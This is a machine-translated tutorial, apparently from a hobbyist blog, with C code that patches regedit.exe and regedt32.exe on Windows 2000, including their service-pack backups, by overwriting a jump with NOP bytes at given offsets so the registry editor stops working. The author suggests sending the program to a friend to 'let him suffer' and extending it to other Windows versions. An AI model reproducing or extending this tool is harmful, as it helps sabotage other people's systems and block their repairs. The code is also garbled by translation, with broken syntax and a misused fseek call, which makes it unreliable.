Complete registry operation

Have you ever encountered a registry locked and cannot open the registry for manual repair? Hoho ~~ A lot of people have a headache for this. I believe you will know the operating principle once you are locked:

Modify disableregistrytools in [HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ System] to 1.
There are also several ways to unlock, suchProgramYou can use an API function to call the Registry to directly Delete the registry, import a reg file, and write a script ............

Today, I will teach you to write a program to implement alternative locks, haha ~~ Are you curious? Come with me.

Lab environment: Windows2000
Objective: To lock the Registry (This method uses the cracker idea to implement it, and directly allows the program to modify program commands so that the Registry Program cannot be called .)
Implementation Method: C program

First, we need to recompile the redirection commands in regedit.exeand regedt32.exe under winntaccording to the cracker's ideas. How to obtain this information is not our purpose today. I will not detail it here. The following is the redirection address I found in the disassembly:
1.regedit.exe
Offset address: 0x69ca change command: 0x74 0x1a to: 0x90 0x90

2.regedt32.exe
Offset address: 0x10bf2 change command: 0x74 0x52 to: 0x90 0x90

Now we use a program to change the commands of these two offset addresses to 0x90 0x90 (0x90 indicates NOP, that is, let the program do nothing and execute the next command) let's see how the program is implemented.

# Include <stdio. h>
# Include <string. h>
Bool scanreg (const char * file, long offset, int length, char * The);/* Function Description */

Main ()
{

Char the [] = {0x90, 0x90 };
Scanreg ("C :\\ winnt \ regedit.exe", 0x69ca, 0x02, the);/* call "Modify the length of regedit.exe under winnt */

Scanreg ("C :\\ winnt \ servicepackfiles \ i386 \ regedit.exe", 0x69ca, 0x02, the);/* adjust regedit.exe */

Scanreg ("C :\\ winnt \ system32 \ regedt32.exe", 0x10bf2, 0x02, the);/* call the handler to modify regedt32.exe under system32 */

Scanreg ("C :\\ winnt \ servicepackfiles \ i386 \ regedt32.exe", 0x10bf2, 0x02, the);/* adjust regedt32.exe */

}
Bool scanreg (const char * file, long offset, int length, char *)
{

File * fp = NULL;
Bool result = false;
If (FP = fopen (file, "RB + "))! = NULL)/* open the file for read/write operations */
{
Fseek (FP, offset, 1);/* point the pointer to the defined offset address */
Fwrite (The, length, 1, FP);/* modify the program and replace the command with 0x90 */
Fclose (FP);/* close the file */
Result = true;
}
Return (result );
}

Well, compile the program and send it to a friend. Let him suffer. Here is just a demonstration. It is only applicable to the 2000 system. We can analyze the Registry calling programs for each Windows system, and then use the API function getversionex (lposversioninfo lpversioninfo) to judge the system in the program, call the corresponding modification function based on the judgment system. Hoho ~~ Isn't that a killer of windows?